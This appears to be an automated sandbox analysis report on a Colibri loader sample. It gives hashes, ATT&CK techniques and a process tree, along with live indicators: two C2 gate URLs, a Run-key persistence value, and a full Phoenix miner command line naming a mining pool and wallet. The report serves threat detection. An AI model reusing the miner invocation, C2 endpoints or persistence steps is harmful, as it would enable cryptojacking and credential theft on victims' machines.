colibri | 5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5

Analysis

max time kernel
140s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2022 03:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
Size

602KB
MD5

9c512797b50b536a82baf18fc9fb3077
SHA1

bd9fc65cb2d62474e510c74e93e8475096661e8c
SHA256

5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5
SHA512

e20abf9a3a0e6d482cc68b8dd6ba809cb3f5dee3e5f326ff05e38fa565f51a8f65b4338bc84fecc871275a6538a401909cbc87fda5e0a852bb6cff06a356ee53
SSDEEP

6144:BBcIhrEveSkYMiYV3URBSDdZgBNAtFySYODL8QS:B/hroLMP3kEgBNAt2QL8QS

Score

10^/10

colibri build1 discovery loader miner persistence spyware stealer

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri

Detectes Phoenix Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

conhost.execonhost.exemsedge.exesvchost.exeDEBE9BEHG2BFH1L.exetmpF2E0.tmp.exetmpF2E0.tmp.exeJ3I686EHKAM36K1.exe64CE8B8EA8F237H.exetmp2EE.tmp.exetmp2EE.tmp.exe1E2L0HLB9H97I0B.exeBFJ67687EFI6F3J.exe

pid	process
3572	conhost.exe
3600	conhost.exe
2196	msedge.exe
2104	svchost.exe
2708	DEBE9BEHG2BFH1L.exe
4324	tmpF2E0.tmp.exe
4508	tmpF2E0.tmp.exe
4988	J3I686EHKAM36K1.exe
5012	64CE8B8EA8F237H.exe
2192	tmp2EE.tmp.exe
1104	tmp2EE.tmp.exe
2236	1E2L0HLB9H97I0B.exe
1704	BFJ67687EFI6F3J.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

J3I686EHKAM36K1.exe1E2L0HLB9H97I0B.exeDEBE9BEHG2BFH1L.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	J3I686EHKAM36K1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	1E2L0HLB9H97I0B.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	DEBE9BEHG2BFH1L.exe

Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

3720 regsvr32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3720	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe"	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

2104 svchost.exe
2104 svchost.exe

pid	process
2104	svchost.exe
2104	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.execonhost.exe5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exetmpF2E0.tmp.exetmp2EE.tmp.exe

description	pid	process	target process
PID 384 set thread context of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 3572 set thread context of 3600	3572	conhost.exe	conhost.exe
PID 4272 set thread context of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4324 set thread context of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 2192 set thread context of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2788 5012 WerFault.exe 64CE8B8EA8F237H.exe

pid	pid_target	process	target process
2788	5012	WerFault.exe	64CE8B8EA8F237H.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

BFJ67687EFI6F3J.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	BFJ67687EFI6F3J.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	BFJ67687EFI6F3J.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync	BFJ67687EFI6F3J.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	BFJ67687EFI6F3J.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

DEBE9BEHG2BFH1L.exeJ3I686EHKAM36K1.exe

pid process

2708 DEBE9BEHG2BFH1L.exe
2708 DEBE9BEHG2BFH1L.exe
2708 DEBE9BEHG2BFH1L.exe
4988 J3I686EHKAM36K1.exe
4988 J3I686EHKAM36K1.exe
4988 J3I686EHKAM36K1.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

DEBE9BEHG2BFH1L.exeJ3I686EHKAM36K1.exe

description pid process

Token: SeDebugPrivilege 2708 DEBE9BEHG2BFH1L.exe
Token: SeDebugPrivilege 4988 J3I686EHKAM36K1.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

BFJ67687EFI6F3J.exe

pid process

1704 BFJ67687EFI6F3J.exe
1704 BFJ67687EFI6F3J.exe

pid	process
2708	DEBE9BEHG2BFH1L.exe
2708	DEBE9BEHG2BFH1L.exe
2708	DEBE9BEHG2BFH1L.exe
4988	J3I686EHKAM36K1.exe
4988	J3I686EHKAM36K1.exe
4988	J3I686EHKAM36K1.exe

description	pid	process
Token: SeDebugPrivilege	2708	DEBE9BEHG2BFH1L.exe
Token: SeDebugPrivilege	4988	J3I686EHKAM36K1.exe

pid	process
1704	BFJ67687EFI6F3J.exe
1704	BFJ67687EFI6F3J.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.execonhost.exe5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.execmd.exemsedge.exeDEBE9BEHG2BFH1L.exetmpF2E0.tmp.exeJ3I686EHKAM36K1.exetmp2EE.tmp.exe

description	pid	process	target process
PID 384 wrote to memory of 3572	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	conhost.exe
PID 384 wrote to memory of 3572	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	conhost.exe
PID 384 wrote to memory of 3572	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 384 wrote to memory of 4272	384	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 3572 wrote to memory of 3600	3572	conhost.exe	conhost.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4272 wrote to memory of 4720	4272	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
PID 4720 wrote to memory of 4904	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	cmd.exe
PID 4720 wrote to memory of 4904	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	cmd.exe
PID 4720 wrote to memory of 4904	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	cmd.exe
PID 4904 wrote to memory of 2196	4904	cmd.exe	msedge.exe
PID 4904 wrote to memory of 2196	4904	cmd.exe	msedge.exe
PID 2196 wrote to memory of 2104	2196	msedge.exe	svchost.exe
PID 2196 wrote to memory of 2104	2196	msedge.exe	svchost.exe
PID 4720 wrote to memory of 2708	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	DEBE9BEHG2BFH1L.exe
PID 4720 wrote to memory of 2708	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	DEBE9BEHG2BFH1L.exe
PID 2708 wrote to memory of 4324	2708	DEBE9BEHG2BFH1L.exe	tmpF2E0.tmp.exe
PID 2708 wrote to memory of 4324	2708	DEBE9BEHG2BFH1L.exe	tmpF2E0.tmp.exe
PID 2708 wrote to memory of 4324	2708	DEBE9BEHG2BFH1L.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4324 wrote to memory of 4508	4324	tmpF2E0.tmp.exe	tmpF2E0.tmp.exe
PID 4720 wrote to memory of 4988	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	J3I686EHKAM36K1.exe
PID 4720 wrote to memory of 4988	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	J3I686EHKAM36K1.exe
PID 4720 wrote to memory of 5012	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	64CE8B8EA8F237H.exe
PID 4720 wrote to memory of 5012	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	64CE8B8EA8F237H.exe
PID 4988 wrote to memory of 2192	4988	J3I686EHKAM36K1.exe	tmp2EE.tmp.exe
PID 4988 wrote to memory of 2192	4988	J3I686EHKAM36K1.exe	tmp2EE.tmp.exe
PID 4988 wrote to memory of 2192	4988	J3I686EHKAM36K1.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 2192 wrote to memory of 1104	2192	tmp2EE.tmp.exe	tmp2EE.tmp.exe
PID 4720 wrote to memory of 2236	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	1E2L0HLB9H97I0B.exe
PID 4720 wrote to memory of 2236	4720	5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe	1E2L0HLB9H97I0B.exe

C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
"C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:384

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3572

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
3⤵
- Executes dropped EXE
PID:3600

C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
"C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4272

C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe
"C:\Users\Admin\AppData\Local\Temp\5ba33d60c4483c65ed0515ab6068a7bd3d429dd80392aa4864070a08c42223c5.exe"
3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4904

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2196

C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2104

C:\Users\Admin\AppData\Local\Temp\DEBE9BEHG2BFH1L.exe
"C:\Users\Admin\AppData\Local\Temp\DEBE9BEHG2BFH1L.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708

C:\Users\Admin\AppData\Local\Temp\tmpF2E0.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpF2E0.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4324

C:\Users\Admin\AppData\Local\Temp\tmpF2E0.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpF2E0.tmp.exe"
6⤵
- Executes dropped EXE
PID:4508

C:\Users\Admin\AppData\Local\Temp\J3I686EHKAM36K1.exe
"C:\Users\Admin\AppData\Local\Temp\J3I686EHKAM36K1.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988

C:\Users\Admin\AppData\Local\Temp\tmp2EE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp2EE.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2192

C:\Users\Admin\AppData\Local\Temp\tmp2EE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp2EE.tmp.exe"
6⤵
- Executes dropped EXE
PID:1104

C:\Users\Admin\AppData\Local\Temp\64CE8B8EA8F237H.exe
"C:\Users\Admin\AppData\Local\Temp\64CE8B8EA8F237H.exe"
4⤵
- Executes dropped EXE
PID:5012

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5012 -s 700
5⤵
- Program crash
PID:2788

C:\Users\Admin\AppData\Local\Temp\1E2L0HLB9H97I0B.exe
"C:\Users\Admin\AppData\Local\Temp\1E2L0HLB9H97I0B.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2236

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s IJJ~Ta.oCV
5⤵
- Loads dropped DLL
PID:3720

C:\Users\Admin\AppData\Local\Temp\BFJ67687EFI6F3J.exe
https://iplogger.org/1QsEf7
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 5012 -ip 5012
1⤵
PID:4180

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E2L0HLB9H97I0B.exe
Filesize
1.5MB

MD5
d98bd41591148df706ec2d8fe0a7d6e4

SHA1
ad68a733556e908cdac27373085c2b117d5d1715

SHA256
af26d60eda28f72cc113648203a0bb555405c092df655fe84396980164956358

SHA512
3678ca5a5c1bc9e6033702d0fc7c38b1d0e4ad390101f5a8a901c00636be442e4da7b287ee869c8b789919a2dcc2bdc96285dd46086d977160487d1e5e7524d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E2L0HLB9H97I0B.exe
Filesize
1.5MB

MD5
d98bd41591148df706ec2d8fe0a7d6e4

SHA1
ad68a733556e908cdac27373085c2b117d5d1715

SHA256
af26d60eda28f72cc113648203a0bb555405c092df655fe84396980164956358

SHA512
3678ca5a5c1bc9e6033702d0fc7c38b1d0e4ad390101f5a8a901c00636be442e4da7b287ee869c8b789919a2dcc2bdc96285dd46086d977160487d1e5e7524d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\64CE8B8EA8F237H.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\64CE8B8EA8F237H.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BFJ67687EFI6F3J.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\BFJ67687EFI6F3J.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\DEBE9BEHG2BFH1L.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\DEBE9BEHG2BFH1L.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\IJJ~Ta.oCV
Filesize
1.6MB

MD5
7e577e4bc3873eaa59f136c5cc233ba2

SHA1
abdcf622e38cee57d942780ce2336d5dc95b6154

SHA256
5b018cae9edf9fedf7a79a206b836a06f58648c59737367aac4f24edf6ad73f9

SHA512
249c8a4af15d339b848532a4c6de844d5bc9460a8ec9a67255b045eeab23e8434fbd9b5853f5c0f27b227dcc39ff967b8f6660c5e6a03e4499278a192030a202

Download Submit
C:\Users\Admin\AppData\Local\Temp\IJJ~Ta.ocV
Filesize
1.6MB

MD5
7e577e4bc3873eaa59f136c5cc233ba2

SHA1
abdcf622e38cee57d942780ce2336d5dc95b6154

SHA256
5b018cae9edf9fedf7a79a206b836a06f58648c59737367aac4f24edf6ad73f9

SHA512
249c8a4af15d339b848532a4c6de844d5bc9460a8ec9a67255b045eeab23e8434fbd9b5853f5c0f27b227dcc39ff967b8f6660c5e6a03e4499278a192030a202

Download Submit
C:\Users\Admin\AppData\Local\Temp\J3I686EHKAM36K1.exe
Filesize
488KB

MD5
39a5d543d6d23b2e72cb92d690ca3d5c

SHA1
95e0cec83ab463df0f6b4c9826aec9b85062ebf2

SHA256
fa4d4493e1008670b0a7559e3e42d0dbc5859b2f089f1cd0bb68f28150596486

SHA512
